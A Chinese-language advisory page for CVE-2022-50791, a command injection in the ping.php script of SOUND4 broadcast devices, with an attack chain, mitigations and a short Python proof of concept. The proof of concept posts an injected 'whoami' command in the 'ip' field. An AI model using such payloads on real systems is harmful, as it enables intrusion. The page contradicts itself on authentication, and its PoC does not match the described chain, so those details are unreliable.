CVE-2022-50791 CVSS 7.8 高危

CVE-2022-50791 SOUND4 IMPACT/FIRST/PULSE/Eco 命令注入漏洞

披露日期: 2025-12-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2022-50791

漏洞类型

命令注入

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SOUND4 IMPACT, SOUND4 FIRST, SOUND4 PULSE, SOUND4 Eco

漏洞概述

CVE-2022-50791是SOUND4 IMPACT/FIRST/PULSE/Eco广播设备软件中存在的一个高危命令注入漏洞。该漏洞存在于ping.php脚本中，允许未经认证的攻击者通过构造恶意的HTTP POST请求执行任意系统命令。攻击者利用/tmp目录创建恶意文件，触发后自动删除痕迹，实现隐蔽攻击。由于该设备通常部署在广播电台等专业环境中，漏洞可能对广播系统的稳定运行和内容安全造成严重影响。CVSS评分7.8，属于高危漏洞。

技术细节

该漏洞是条件性命令注入（Conditional Command Injection）类型。攻击流程如下：1）具有低权限的本地认证用户可以在/tmp目录中创建包含恶意命令的文件；2）攻击者通过向ping.php脚本发送单个HTTP POST请求，利用该脚本的ping功能触发之前创建的恶意文件；3）恶意文件被触发执行后，系统会自动删除该文件以消除痕迹。漏洞根源在于ping.php脚本对用户输入缺乏充分的输入验证和清理，允许通过参数注入系统命令。攻击者利用/tmp目录的临时文件特性和脚本的执行逻辑，构建了一条隐蔽的攻击路径。

攻击链分析

STEP 1

步骤1

本地认证用户或攻击者获取系统低权限访问，在/tmp目录创建包含恶意命令的文件

STEP 2

步骤2

攻击者构造HTTP POST请求，向目标服务器的ping.php脚本发送恶意payload

STEP 3

步骤3

ping.php脚本处理请求时，未正确过滤用户输入，导致命令注入执行

STEP 4

步骤4

恶意文件被触发执行，攻击者获得系统命令执行能力

STEP 5

步骤5

执行完成后，系统自动删除/tmp目录中的恶意文件，消除攻击痕迹

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2022-50791 PoC - SOUND4 IMPACT/FIRST/PULSE/Eco Command Injection
# Target: ping.php script

target_url = "http://target.com/ping.php"

# Malicious payload to inject command
payload = {
    "ip": "127.0.0.1; whoami > /tmp/pwned.txt"
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

影响范围

SOUND4 IMPACT <= 2.x

SOUND4 FIRST <= 2.x

SOUND4 PULSE <= 2.x

SOUND4 Eco <= 2.x

防御指南

临时缓解措施

在厂商发布修复补丁前，可采取以下临时措施：1）通过网络隔离限制对设备的访问；2）禁用或限制ping.php脚本的功能；3）监控/tmp目录的文件创建行为；4）配置入侵检测系统监控异常HTTP请求；5）审查并限制设备的网络暴露面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表